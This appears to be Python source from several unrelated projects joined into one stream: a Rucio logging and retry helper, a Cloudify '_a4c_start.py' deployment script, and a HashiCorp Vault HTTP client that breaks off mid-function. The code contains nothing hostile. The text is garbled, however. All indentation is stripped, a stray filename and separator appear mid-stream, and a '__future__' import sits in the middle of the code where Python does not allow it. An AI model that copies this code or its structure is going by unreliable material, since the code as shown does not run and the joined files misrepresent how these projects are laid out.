if re.match(str(cfg_forced_modules), module_name):
return True
return False
# creating log
if not logger_name:
if not module_name:
logger_name = 'usr'
else:
logger_name = module_name.split('.')[-1]
logger = logging.getLogger(logger_name)
# extracting the log level
if not logger_level:
logger_level = logging.INFO
if verbose:
logger_level = logging.DEBUG
# overriding by the config
cfg_levels = (logging.DEBUG, logging.INFO, logging.WARNING, logging.ERROR)
for level in cfg_levels:
cfg_opt = 'forceloglevel' + logging.getLevelName(level)
if _force_cfg_log_level(cfg_opt):
logger_level = level
# setting the log level
logger.setLevel(logger_level)
# preferred logger handling
def add_handler(logger):
hdlr = logging.StreamHandler()
def emit_decorator(fnc):
def func(*args):
if 'RUCIO_LOGGING_FORMAT' not in os.environ:
levelno = args[0].levelno
format_str = '%(asctime)s\t%(levelname)s\t%(message)s\033[0m'
if levelno >= logging.CRITICAL:
color = '\033[31;1m'
elif levelno >= logging.ERROR:
color = '\033[31;1m'
elif levelno >= logging.WARNING:
color = '\033[33;1m'
elif levelno >= logging.INFO:
color = '\033[32;1m'
elif levelno >= logging.DEBUG:
color = '\033[36;1m'
format_str = '%(asctime)s\t%(levelname)s\t%(filename)s\t%(message)s\033[0m'
else:
color = '\033[0m'
formatter = logging.Formatter('{0}{1}'.format(color, format_str))
else:
formatter = logging.Formatter(os.environ['RUCIO_LOGGING_FORMAT'])
hdlr.setFormatter(formatter)
return fnc(*args)
return func
hdlr.emit = emit_decorator(hdlr.emit)
logger.addHandler(hdlr)
# setting handler and formatter
if not logger.handlers:
add_handler(logger)
return logger
def daemon_sleep(start_time, sleep_time, graceful_stop, logger=logging.log):
"""Sleeps a daemon the time provided by sleep_time"""
end_time = time.time()
time_diff = end_time - start_time
if time_diff < sleep_time:
logger(logging.INFO, 'Sleeping for a while : %s seconds', (sleep_time - time_diff))
graceful_stop.wait(sleep_time - time_diff)
def is_client():
""""
Checks if the function is called from a client or from a server/daemon
:returns client_mode: True if is called from a client, False if it is called from a server/daemon
"""
if 'RUCIO_CLIENT_MODE' not in os.environ:
if config_has_section('database'):
client_mode = False
elif config_has_section('client'):
client_mode = True
else:
client_mode = False
else:
if os.environ['RUCIO_CLIENT_MODE']:
client_mode = True
else:
client_mode = False
return client_mode
class retry:
"""Retry callable object with configuragle number of attempts"""
def __init__(self, func, *args, **kwargs):
        '''
        :param func: a method that should be executed with retries
        :param args: parameters of the func
        :param kwargs: keyword arguments of the func
        '''
self.func, self.args, self.kwargs = func, args, kwargs
def __call__(self, mtries=3, logger=logging.log):
'''
:param mtries: maximum number of attempts to execute the function
:param logger: preferred logger
'''
attempt = mtries
while attempt > 1:
try:
if logger:
logger(logging.DEBUG, '{}: Attempt {}'.format(self.func.__name__, mtries - attempt + 1))
return self.func(*self.args, **self.kwargs)
except Exception as e:
if logger:
logger(logging.DEBUG, '{}: Attempt failed {}'.format(self.func.__name__, mtries - attempt + 1))
logger(logging.DEBUG, str(e))
attempt -= 1
return self.func(*self.args, **self.kwargs)
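# --- Illustrative usage (added sketch, not part of the original module) ---
# retry() wraps the callable at construction; the attempt count is passed
# when the wrapper itself is invoked. The flaky function below is hypothetical.
def _example_retry():
    state = {'calls': 0}
    def flaky():
        state['calls'] += 1
        if state['calls'] < 3:
            raise RuntimeError('transient failure')
        return 'ok'
    return retry(flaky)(mtries=3)  # succeeds on the third and final attempt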
class StoreAndDeprecateWarningAction(argparse.Action):
'''
StoreAndDeprecateWarningAction is a descendant of :class:`argparse.Action`
and represents a store action with a deprecated argument name.
'''
def __init__(self,
option_strings,
new_option_string,
dest,
**kwargs):
"""
:param option_strings: all possible argument name strings
:param new_option_string: the new option string which replaces the old
:param dest: name of variable to store the value in
:param kwargs: everything else
"""
super(StoreAndDeprecateWarningAction, self).__init__(
option_strings=option_strings,
dest=dest,
**kwargs)
assert new_option_string in option_strings
self.new_option_string = new_option_string
def __call__(self, parser, namespace, values, option_string=None):
if option_string and option_string != self.new_option_string:
            # The logger typically gets initialized after the argument parser
            # to set the verbosity of the logger. Thus using simple print to console.
print("Warning: The commandline argument {} is deprecated! Please use {} in the future.".format(option_string, self.new_option_string))
setattr(namespace, self.dest, values)
class StoreTrueAndDeprecateWarningAction(argparse._StoreConstAction):
    '''
    StoreTrueAndDeprecateWarningAction is a descendant of :class:`argparse._StoreConstAction`
    and represents a store-true action with a deprecated argument name.
    '''
def __init__(self,
option_strings,
new_option_string,
dest,
default=False,
required=False,
help=None):
"""
:param option_strings: all possible argument name strings
:param new_option_string: the new option string which replaces the old
:param dest: name of variable to store the value in
:param kwargs: everything else
"""
super(StoreTrueAndDeprecateWarningAction, self).__init__(
option_strings=option_strings,
dest=dest,
const=True,
default=default,
required=required,
help=help)
assert new_option_string in option_strings
self.new_option_string = new_option_string
def __call__(self, parser, namespace, values, option_string=None):
super(StoreTrueAndDeprecateWarningAction, self).__call__(parser, namespace, values, option_string=option_string)
if option_string and option_string != self.new_option_string:
            # The logger typically gets initialized after the argument parser
            # to set the verbosity of the logger. Thus using simple print to console.
print("Warning: The commandline argument {} is deprecated! Please use {} in the future.".format(option_string, self.new_option_string))
|
_a4c_start.py
|
from cloudify import ctx
from cloudify import utils
from cloudify.exceptions import NonRecoverableError
from StringIO import StringIO
import base64
import os
import platform
import re
import subprocess
import sys
import time
import threading
import json
def convert_env_value_to_string(envDict):
    # iterate over a snapshot since the dict is mutated while looping
    for key, value in list(envDict.items()):
        envDict.pop(key)
        envDict[str(key)] = str(value)
def get_attribute_user(ctx):
if get_attribute_from_top_host(ctx, 'user'):
return get_attribute_from_top_host(ctx, 'user')
if get_attribute(ctx, 'cloudify_agent'):
return get_attribute(ctx, 'cloudify_agent').get('user', None)
if get_attribute(ctx, 'agent_config'):
return get_attribute(ctx, 'agent_config').get('user', None)
return None
def get_attribute_key(ctx):
if get_attribute_from_top_host(ctx, 'key'):
return get_attribute_from_top_host(ctx, 'key')
if get_attribute(ctx, 'cloudify_agent'):
return get_attribute(ctx, 'cloudify_agent').get('key', None)
if get_attribute(ctx, 'agent_config'):
return get_attribute(ctx, 'agent_config').get('key', None)
return None
def get_host(entity):
if entity.instance.relationships:
for relationship in entity.instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target
return None
def has_attribute_mapping(entity, attribute_name):
# ctx.logger.debug('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name,json.dumps(entity.node.properties)))
mapping_configuration = entity.node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def process_attribute_mapping(entity, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = entity.node.properties['_a4c_att_' + attribute_name]
# ctx.logger.debug('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, json.dumps(mapping_configuration)))
# If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name
# Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(entity, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and entity.instance.relationships:
for relationship in entity.instance.relationships:
if mapping_configuration['parameters'][1] in relationship.type_hierarchy:
return data_retriever_function(relationship.target, mapping_configuration['parameters'][2])
return ""
def get_nested_attribute(entity, attribute_names):
deep_properties = get_attribute(entity, attribute_names[0])
attribute_names_iter = iter(attribute_names)
next(attribute_names_iter)
for attribute_name in attribute_names_iter:
if deep_properties is None:
return ""
else:
deep_properties = deep_properties.get(attribute_name, None)
return deep_properties
def _all_instances_get_nested_attribute(entity, attribute_names):
return None
def get_attribute(entity, attribute_name):
if has_attribute_mapping(entity, attribute_name):
# First check if any mapping exist for attribute
mapped_value = process_attribute_mapping(entity, attribute_name, get_attribute)
# ctx.logger.debug('Mapping exists for attribute {0} with value {1}'.format(attribute_name, json.dumps(mapped_value)))
return mapped_value
# No mapping exist, try to get directly the attribute from the entity
attribute_value = entity.instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
# ctx.logger.debug('Found the attribute {0} with value {1} on the node {2}'.format(attribute_name, json.dumps(attribute_value), entity.node.id))
return attribute_value
# Attribute retrieval fails, fall back to property
property_value = entity.node.properties.get(attribute_name, None)
if property_value is not None:
return property_value
# Property retrieval fails, fall back to host instance
host = get_host(entity)
if host is not None:
# ctx.logger.debug('Attribute not found {0} go up to the parent node {1}'.format(attribute_name, host.node.id))
return get_attribute(host, attribute_name)
# Nothing is found
return ""
def get_target_capa_or_node_attribute(entity, capability_attribute_name, attribute_name):
attribute_value = entity.instance.runtime_properties.get(capability_attribute_name, None)
if attribute_value is not None:
# ctx.logger.debug('Found the capability attribute {0} with value {1} on the node {2}'.format(attribute_name, json.dumps(attribute_value), entity.node.id))
return attribute_value
return get_attribute(entity, attribute_name)
def _all_instances_get_attribute(entity, attribute_name):
result_map = {}
# get all instances data using cfy rest client
# we have to get the node using the rest client with node_instance.node_id
# then we will have the relationships
node = client.nodes.get(ctx.deployment.id, entity.node.id)
all_node_instances = client.node_instances.list(ctx.deployment.id, entity.node.id)
for node_instance in all_node_instances:
prop_value = __recursively_get_instance_data(node, node_instance, attribute_name)
if prop_value is not None:
# ctx.logger.debug('Found the property/attribute {0} with value {1} on the node {2} instance {3}'.format(attribute_name, json.dumps(prop_value), entity.node.id,
# node_instance.id))
result_map[node_instance.id + '_'] = prop_value
return result_map
# Same as previous method but will first try to find the attribute on the capability.
def _all_instances_get_target_capa_or_node_attribute(entity, capability_attribute_name, attribute_name):
result_map = {}
node = client.nodes.get(ctx.deployment.id, entity.node.id)
all_node_instances = client.node_instances.list(ctx.deployment.id, entity.node.id)
for node_instance in all_node_instances:
attribute_value = node_instance.runtime_properties.get(capability_attribute_name, None)
if attribute_value is not None:
prop_value = attribute_value
else:
prop_value = __recursively_get_instance_data(node, node_instance, attribute_name)
if prop_value is not None:
# ctx.logger.debug('Found the property/attribute {0} with value {1} on the node {2} instance {3}'.format(attribute_name, json.dumps(prop_value), entity.node.id,
# node_instance.id))
result_map[node_instance.id + '_'] = prop_value
return result_map
def get_property(entity, property_name):
# Try to get the property value on the node
property_value = entity.node.properties.get(property_name, None)
if property_value is not None:
# ctx.logger.debug('Found the property {0} with value {1} on the node {2}'.format(property_name, json.dumps(property_value), entity.node.id))
return property_value
# No property found on the node, fall back to the host
host = get_host(entity)
if host is not None:
# ctx.logger.debug('Property not found {0} go up to the parent node {1}'.format(property_name, host.node.id))
return get_property(host, property_name)
return ""
def get_instance_list(node_id):
result = ''
all_node_instances = client.node_instances.list(ctx.deployment.id, node_id)
for node_instance in all_node_instances:
if len(result) > 0:
result += ','
result += node_instance.id
return result
def get_host_node_name(instance):
for relationship in instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target.node.id
return None
def __get_relationship(node, target_name, relationship_type):
for relationship in node.relationships:
if relationship.get('target_id') == target_name and relationship_type in relationship.get('type_hierarchy'):
return relationship
return None
def __has_attribute_mapping(node, attribute_name):
# ctx.logger.debug('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, json.dumps(node.properties)))
mapping_configuration = node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def __process_attribute_mapping(node, node_instance, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = node.properties['_a4c_att_' + attribute_name]
# ctx.logger.debug('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, json.dumps(mapping_configuration)))
# If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name
# Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(node, node_instance, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and node_instance.relationships:
for rel in node_instance.relationships:
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if mapping_configuration['parameters'][1] in relationship.get('type_hierarchy'):
target_instance = client.node_instances.get(rel.get('target_id'))
target_node = client.nodes.get(ctx.deployment.id, target_instance.node_id)
return data_retriever_function(target_node, target_instance, mapping_configuration['parameters'][2])
return None
def __recursively_get_instance_data(node, node_instance, attribute_name):
if __has_attribute_mapping(node, attribute_name):
return __process_attribute_mapping(node, node_instance, attribute_name, __recursively_get_instance_data)
attribute_value = node_instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
return attribute_value
elif node_instance.relationships:
for rel in node_instance.relationships:
# on rel we have target_name, target_id (instanceId), type
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if 'cloudify.relationships.contained_in' in relationship.get('type_hierarchy'):
parent_instance = client.node_instances.get(rel.get('target_id'))
parent_node = client.nodes.get(ctx.deployment.id, parent_instance.node_id)
return __recursively_get_instance_data(parent_node, parent_instance, attribute_name)
return None
else:
return None
def get_public_or_private_ip(entity):
public_ip = get_attribute(entity, 'public_ip_address')
if not public_ip:
return get_attribute(entity, 'ip_address')
return public_ip
def get_attribute_from_top_host(entity, attribute_name):
host = get_host(entity)
while host is not None:
entity = host
host = get_host(entity)
return get_attribute(entity, attribute_name)
from cloudify import utils
from cloudify_rest_client import CloudifyClient
from cloudify.state import ctx_parameters as inputs
import os
client = CloudifyClient(host=utils.get_manager_ip(),
port=utils.get_manager_rest_service_port(),
protocol='https',
cert=utils.get_local_rest_certificate(),
                        token=utils.get_rest_token(),
                        tenant=utils.get_tenant_name())
from __future__ import unicode_literals
import json
try:
import hcl
has_hcl_parser = True
except ImportError:
has_hcl_parser = False
import requests
try:
from urlparse import urljoin
except ImportError:
from urllib.parse import urljoin
class VaultError(Exception):
def __init__(self, message=None, errors=None):
if errors:
message = ', '.join(errors)
self.errors = errors
super(VaultError, self).__init__(message)
class InvalidRequest(VaultError):
pass
class Unauthorized(VaultError):
pass
class Forbidden(VaultError):
pass
class InvalidPath(VaultError):
pass
class RateLimitExceeded(VaultError):
pass
class InternalServerError(VaultError):
pass
class VaultNotInitialized(VaultError):
pass
class VaultDown(VaultError):
pass
class UnexpectedError(VaultError):
pass
class HashiCorpVaultClient(object):
def __init__(self, url='http://localhost:8200', token=None,
cert=None, verify=True, timeout=30, proxies=None,
allow_redirects=True, session=None):
if not session:
session = requests.Session()
self.allow_redirects = allow_redirects
self.session = session
self.token = token
self._url = url
self._kwargs = {
'cert': cert,
'verify': verify,
'timeout': timeout,
'proxies': proxies,
}
def read(self, path, wrap_ttl=None):
"""
GET /<path>
"""
try:
return self._get('/v1/{0}'.format(path), wrap_ttl=wrap_ttl).json()
except InvalidPath:
return None
def list(self, path):
"""
GET /<path>?list=true
"""
try:
payload = {
'list': True
}
return self._get('/v1/{}'.format(path), params=payload).json()
except InvalidPath:
return None
def write(self, path, wrap_ttl=None, **kwargs):
"""
PUT /<path>
"""
response = self._put('/v1/{0}'.format(path), json=kwargs, wrap_ttl=wrap_ttl)
if response.status_code == 200:
return response.json()
def delete(self, path):
"""
DELETE /<path>
"""
self._delete('/v1/{0}'.format(path))
def unwrap(self, token):
"""
GET /cubbyhole/response
X-Vault-Token: <token>
"""
path = "cubbyhole/response"
_token = self.token
try:
self.token = token
return json.loads(self.read(path)['data']['response'])
finally:
self.token = _token
def is_initialized(self):
"""
GET /sys/init
"""
return self._get('/v1/sys/init').json()['initialized']
def initialize(self, secret_shares=5, secret_threshold=3, pgp_keys=None):
"""
PUT /sys/init
"""
params = {
'secret_shares': secret_shares,
'secret_threshold': secret_threshold,
}
if pgp_keys:
if len(pgp_keys) != secret_shares:
raise ValueError('Length of pgp_keys must equal secret shares')
params['pgp_keys'] = pgp_keys
return self._put('/v1/sys/init', json=params).json()
@property
def seal_status(self):
"""
GET /sys/seal-status
"""
return self._get('/v1/sys/seal-status').json()
def is_sealed(self):
return self.seal_status['sealed']
def seal(self):
"""
PUT /sys/seal
"""
self._put('/v1/sys/seal')
def unseal_reset(self):
"""
PUT /sys/unseal
"""
params = {
'reset': True,
}
return self._put('/v1/sys/unseal', json=params).json()
def unseal(self, key):
"""
PUT /sys/unseal
"""
params = {
'key': key,
}
return self._put('/v1/sys/unseal', json=params).json()
def unseal_multi(self, keys):
result = None
for key in keys:
result = self.unseal(key)
if not result['sealed']:
break
return result
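    # Illustrative unseal flow (added sketch, not part of the original client);
    # values are hypothetical and assume a freshly initialised dev server:
    #
    #     client = HashiCorpVaultClient(url='http://localhost:8200')
    #     shares = client.initialize(secret_shares=5, secret_threshold=3)
    #     client.unseal_multi(shares['keys'][:3])  # stops once unsealed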
@property
def key_status(self):
"""
GET /sys/key-status
"""
return self._get('/v1/sys/key-status').json()
def rotate(self):
"""
PUT /sys/rotate
"""
self._put('/v1/sys/rotate')
@property
def rekey_status(self):
"""
GET /sys/rekey/init
"""
return self._get('/v1/sys/rekey/init').json()
def start_rekey(self, secret_shares=5, secret_threshold=3, pgp_keys=None,
backup=False):
"""
PUT /sys/rekey/init
"""
params = {
'secret_shares': secret_shares,
'secret_threshold': secret_threshold,
}
if pgp_keys:
if len(pgp_keys) != secret_shares:
raise ValueError('Length of pgp_keys must equal secret shares')
params['pgp_keys'] = pgp_keys
params['backup'] = backup
resp = self._put('/v1/sys/rekey/init', json=params)
if resp.text:
return resp.json()
def cancel_rekey(self):
"""
DELETE /sys/rekey/init
"""
self._delete('/v1/sys/rekey/init')
def rekey(self, key, nonce=None):
"""
PUT /sys/rekey/update
"""
params = {
'key': key,
}
if nonce:
params['nonce'] = nonce
return self._put('/v1/sys/rekey/update', json=params).json()
def rekey_multi(self, keys, nonce=None):
result = None
for key in keys:
result = self.rekey(key, nonce=nonce)
if 'complete' in result and result['complete']:
break
return result
def get_backed_up_keys(self):
"""
GET /sys/rekey/backup
"""
return self._get('/v1/sys/rekey/backup').json()
@property
def ha_status(self):
"""
GET /sys/leader
"""
return self._get('/v1/sys/leader').json()
def renew_secret(self, lease_id, increment=None):
"""
PUT /sys/leases/renew
"""
params = {
'lease_id': lease_id,
'increment': increment,
}
return self._put('/v1/sys/leases/renew', json=params).json()
def revoke_secret(self, lease_id):
"""
PUT /sys/revoke/<lease id>
"""
self._put('/v1/sys/revoke/{0}'.format(lease_id))
def revoke_secret_prefix(self, path_prefix):
"""
PUT /sys/revoke-prefix/<path prefix>
"""
self._put('/v1/sys/revoke-prefix/{0}'.format(path_prefix))
def revoke_self_token(self):
"""
PUT /auth/token/revoke-self
"""
self._put('/v1/auth/token/revoke-self')
def list_secret_backends(self):
"""
GET /sys/mounts
"""
return self._get('/v1/sys/mounts').json()
def enable_secret_backend(self, backend_type, description=None, mount_point=None, config=None):
"""
POST /sys/auth/<mount point>
"""
if not mount_point:
mount_point = backend_type
params = {
'type': backend_type,
'description': description,
'config': config,
}
self._post('/v1/sys/mounts/{0}'.format(mount_point), json=params)
def tune_secret_backend(self, backend_type, mount_point=None, default_lease_ttl=None, max_lease_ttl=None):
"""
POST /sys/mounts/<mount point>/tune
"""
if not mount_point:
mount_point = backend_type
params = {
'default_lease_ttl': default_lease_ttl,
'max_lease_ttl': max_lease_ttl
}
self._post('/v1/sys/mounts/{0}/tune'.format(mount_point), json=params)
def get_secret_backend_tuning(self, backend_type, mount_point=None):
"""
GET /sys/mounts/<mount point>/tune
"""
if not mount_point:
mount_point = backend_type
return self._get('/v1/sys/mounts/{0}/tune'.format(mount_point)).json()
def disable_secret_backend(self, mount_point):
"""
DELETE /sys/mounts/<mount point>
"""
self._delete('/v1/sys/mounts/{0}'.format(mount_point))
def remount_secret_backend(self, from_mount_point, to_mount_point):
"""
POST /sys/remount
"""
params = {
'from': from_mount_point,
'to': to_mount_point,
}
self._post('/v1/sys/remount', json=params)
def list_policies(self):
"""
GET /sys/policy
"""
return self._get('/v1/sys/policy').json()['policies']
def get_policy(self, name, parse=False):
"""
GET /sys/policy/<name>
"""
try:
policy = self._get('/v1/sys/policy/{0}'.format(name)).json()['rules']
if parse:
if not has_hcl_parser:
raise ImportError('pyhcl is required for policy parsing')
policy = hcl.loads(policy)
return policy
except InvalidPath:
return None
def set_policy(self, name, rules):
"""
PUT /sys/policy/<name>
"""
if isinstance(rules, dict):
rules = json.dumps(rules)
params = {
'rules': rules,
}
self._put('/v1/sys/policy/{0}'.format(name), json=params)
def delete_policy(self, name):
"""
DELETE /sys/policy/<name>
"""
self._delete('/v1/sys/policy/{0}'.format(name))
def list_audit_backends(self):
"""
GET /sys/audit
"""
return self._get('/v1/sys/audit').json()
def enable_audit_backend(self, backend_type, description=None, options=None, name=None):
"""
POST /sys/audit/<name>
"""
if not name:
name = backend_type
params = {
'type': backend_type,
'description': description,
'options': options,
}
self._post('/v1/sys/audit/{0}'.format(name), json=params)
def disable_audit_backend(self, name):
"""
DELETE /sys/audit/<name>
"""
self._delete('/v1/sys/audit/{0}'.format(name))
def audit_hash(self, name, input):
"""
POST /sys/audit-hash
"""
params = {
'input': input,
}
return self._post('/v1/sys/audit-hash/{0}'.format(name), json=params).json()
def create_token(self, role=None, token_id=None, policies=None, meta=None,
no_parent=False, lease=None, display_name=None,
num_uses=None, no_default_policy=False,
ttl=None, orphan=False, wrap_ttl=None, renewable=None,
explicit_max_ttl=None):
"""
POST /auth/token/create
POST /auth/token/create/<role>
POST /auth/token/create-orphan
"""
params = {
'id': token_id,
'policies': policies,
'meta': meta,
'no_parent': no_parent,
'display_name': display_name,
'num_uses': num_uses,
'no_default_policy': no_default_policy,
'renewable': renewable
}
        if lease:
            params['lease'] = lease
        else:
            params['ttl'] = ttl
        if explicit_max_ttl:
            params['explicit_max_ttl'] = explicit_max_ttl
if orphan:
return self._post('/v1/auth/token/create-orphan', json=params, wrap_ttl=wrap_ttl).json()
elif role:
return self._post('/v1/auth/token/create/{0}'.format(role), json=params, wrap_ttl=wrap_ttl).json()
else:
return self._post('/v1/auth/token/create', json=params, wrap_ttl=wrap_ttl).json()
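    # Example (a sketch; the policy name and TTLs are assumptions): minting a
    # short-lived, non-renewable token wrapped for secure hand-off.
    #
    #   wrapped = client.create_token(policies=['web'], ttl='1h',
    #                                 renewable=False, wrap_ttl='60s')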
def lookup_token(self, token=None, accessor=False, wrap_ttl=None):
"""
GET /auth/token/lookup/<token>
GET /auth/token/lookup-accessor/<token-accessor>
GET /auth/token/lookup-self
"""
if token:
if accessor:
path = '/v1/auth/token/lookup-accessor/{0}'.format(token)
return self._post(path, wrap_ttl=wrap_ttl).json()
else:
return self._get('/v1/auth/token/lookup/{0}'.format(token)).json()
else:
return self._get('/v1/auth/token/lookup-self', wrap_ttl=wrap_ttl).json()
def revoke_token(self, token, orphan=False, accessor=False):
"""
POST /auth/token/revoke/<token>
POST /auth/token/revoke-orphan/<token>
POST /auth/token/revoke-accessor/<token-accessor>
"""
if accessor and orphan:
msg = "revoke_token does not support 'orphan' and 'accessor' flags together"
raise InvalidRequest(msg)
elif accessor:
self._post('/v1/auth/token/revoke-accessor/{0}'.format(token))
elif orphan:
self._post('/v1/auth/token/revoke-orphan/{0}'.format(token))
else:
self._post('/v1/auth/token/revoke/{0}'.format(token))
def revoke_token_prefix(self, prefix):
"""
POST /auth/token/revoke-prefix/<prefix>
"""
self._post('/v1/auth/token/revoke-prefix/{0}'.format(prefix))
def renew_token(self, token=None, increment=None, wrap_ttl=None):
"""
POST /auth/token/renew/<token>
POST /auth/token/renew-self
"""
params = {
'increment': increment,
}
if token:
path = '/v1/auth/token/renew/{0}'.format(token)
return self._post(path, json=params, wrap_ttl=wrap_ttl).json()
else:
return self._post('/v1/auth/token/renew-self', json=params, wrap_ttl=wrap_ttl).json()
def create_token_role(self, role,
allowed_policies=None, orphan=None, period=None,
renewable=None, path_suffix=None, explicit_max_ttl=None):
"""
POST /auth/token/roles/<role>
"""
params = {
'allowed_policies': allowed_policies,
'orphan': orphan,
'period': period,
'renewable': renewable,
'path_suffix': path_suffix,
'explicit_max_ttl': explicit_max_ttl
}
return self._post('/v1/auth/token/roles/{0}'.format(role), json=params)
def token_role(self, role):
"""
Returns the named token role.
"""
return self.read('auth/token/roles/{0}'.format(role))
def delete_token_role(self, role):
"""
Deletes the named token role.
"""
return self.delete('auth/token/roles/{0}'.format(role))
def list_token_roles(self):
"""
GET /auth/token/roles?list=true
"""
return self.list('auth/token/roles')
def logout(self, revoke_token=False):
"""
Clears the token used for authentication, optionally revoking it before doing so
"""
if revoke_token:
self.revoke_self_token()
self.token = None
def is_authenticated(self):
"""
Helper method which returns the authentication status of the client
"""
if not self.token:
return False
try:
self.lookup_token()
return True
except Forbidden:
return False
except InvalidPath:
return False
except InvalidRequest:
return False
def auth_app_id(self, app_id, user_id, mount_point='app-id', use_token=True):
"""
POST /auth/<mount point>/login
"""
params = {
'app_id': app_id,
'user_id': user_id,
}
return self.auth('/v1/auth/{0}/login'.format(mount_point), json=params, use_token=use_token)
def auth_tls(self, mount_point='cert', use_token=True):
"""
POST /auth/<mount point>/login
"""
return self.auth('/v1/auth/{0}/login'.format(mount_point), use_token=use_token)
def auth_userpass(self, username, password, mount_point='userpass', use_token=True, **kwargs):
"""
POST /auth/<mount point>/login/<username>
"""
params = {
'password': password,
}
params.update(kwargs)
return self.auth('/v1/auth/{0}/login/{1}'.format(mount_point, username), json=params, use_token=use_token)
def auth_ec2(self, pkcs7, nonce=None, role=None, use_token=True):
"""
POST /auth/aws-ec2/login
"""
params = {'pkcs7': pkcs7}
if nonce:
params['nonce'] = nonce
if role:
params['role'] = role
return self.auth('/v1/auth/aws-ec2/login', json=params, use_token=use_token).json()
def create_userpass(self, username, password, policies, mount_point='userpass', **kwargs):
"""
POST /auth/<mount point>/users/<username>
"""
        # Users can have more than one policy. It is easier for the user to pass in
        # the policies as a list, so if they do, convert it to a comma-delimited string.
if isinstance(policies, (list, set, tuple)):
policies = ','.join(policies)
params = {
'password': password,
'policies': policies
}
params.update(kwargs)
return self._post('/v1/auth/{}/users/{}'.format(mount_point, username), json=params)
def delete_userpass(self, username, mount_point='userpass'):
"""
DELETE /auth/<mount point>/users/<username>
"""
return self._delete('/v1/auth/{}/users/{}'.format(mount_point, username))
def create_app_id(self, app_id, policies, display_name=None, mount_point='app-id', **kwargs):
"""
POST /auth/<mount point>/map/app-id/<app_id>
"""
        # An app-id can have more than one policy. It is easier for the user to pass in
        # the policies as a list, so if they do, convert it to a comma-delimited string.
if isinstance(policies, (list, set, tuple)):
policies = ','.join(policies)
params = {
'value': policies
}
        # Only use the display_name if it has a value. Made it a named param for user
        # convenience instead of leaving it as part of the kwargs
if display_name:
params['display_name'] = display_name
params.update(kwargs)
return self._post('/v1/auth/{}/map/app-id/{}'.format(mount_point, app_id), json=params)
def get_app_id(self, app_id, mount_point='app-id', wrap_ttl=None):
"""
GET /auth/<mount_point>/map/app-id/<app_id>
"""
path = '/v1/auth/{0}/map/app-id/{1}'.format(mount_point, app_id)
return self._get(path, wrap_ttl=wrap_ttl).json()
def delete_app_id(self, app_id, mount_point='app-id'):
"""
DELETE /auth/<mount_point>/map/app-id/<app_id>
"""
return self._delete('/v1/auth/{0}/map/app-id/{1}'.format(mount_point, app_id))
def create_user_id(self, user_id, app_id, cidr_block=None, mount_point='app-id', **kwargs):
"""
POST /auth/<mount point>/map/user-id/<user_id>
"""
        # A user-id can be associated with more than one app-id (aka policy). It is
        # easier for the user to pass in the policies as a list, so if they do,
        # convert it to a comma-delimited string.
if isinstance(app_id, (list, set, tuple)):
app_id = ','.join(app_id)
params = {
'value': app_id
}
        # Only use the cidr_block if it has a value. Made it a named param for user
        # convenience instead of leaving it as part of the kwargs
if cidr_block:
params['cidr_block'] = cidr_block
params.update(kwargs)
return self._post('/v1/auth/{}/map/user-id/{}'.format(mount_point, user_id), json=params)
def get_user_id(self, user_id, mount_point='app-id', wrap_ttl=None):
"""
GET /auth/<mount_point>/map/user-id/<user_id>
"""
path = '/v1/auth/{0}/map/user-id/{1}'.format(mount_point, user_id)
return self._get(path, wrap_ttl=wrap_ttl).json()
def delete_user_id(self, user_id, mount_point='app-id'):
"""
DELETE /auth/<mount_point>/map/user-id/<user_id>
"""
return self._delete('/v1/auth/{0}/map/user-id/{1}'.format(mount_point, user_id))
def create_vault_ec2_client_configuration(self, access_key, secret_key, endpoint=None):
"""
POST /auth/aws-ec2/config/client
"""
params = {
'access_key': access_key,
'secret_key': secret_key
}
if endpoint is not None:
params['endpoint'] = endpoint
return self._post('/v1/auth/aws-ec2/config/client', json=params)
def get_vault_ec2_client_configuration(self):
"""
GET /auth/aws-ec2/config/client
"""
return self._get('/v1/auth/aws-ec2/config/client').json()
def delete_vault_ec2_client_configuration(self):
"""
DELETE /auth/aws-ec2/config/client
"""
return self._delete('/v1/auth/aws-ec2/config/client')
def create_vault_ec2_certificate_configuration(self, cert_name, aws_public_cert):
"""
POST /auth/aws-ec2/config/certificate/<cert_name>
"""
params = {
'cert_name': cert_name,
'aws_public_cert': aws_public_cert
}
return self._post('/v1/auth/aws-ec2/config/certificate/{0}'.format(cert_name), json=params)
def get_vault_ec2_certificate_configuration(self, cert_name):
"""
GET /auth/aws-ec2/config/certificate/<cert_name>
"""
return self._get('/v1/auth/aws-ec2/config/certificate/{0}'.format(cert_name)).json()
def list_vault_ec2_certificate_configurations(self):
"""
GET /auth/aws-ec2/config/certificates?list=true
"""
params = {'list': True}
return self._get('/v1/auth/aws-ec2/config/certificates', params=params).json()
def create_ec2_role(self, role, bound_ami_id=None, bound_account_id=None, bound_iam_role_arn=None,
bound_iam_instance_profile_arn=None, role_tag=None, max_ttl=None, policies=None,
allow_instance_migration=False, disallow_reauthentication=False, **kwargs):
"""
POST /auth/aws-ec2/role/<role>
"""
params = {
'role': role,
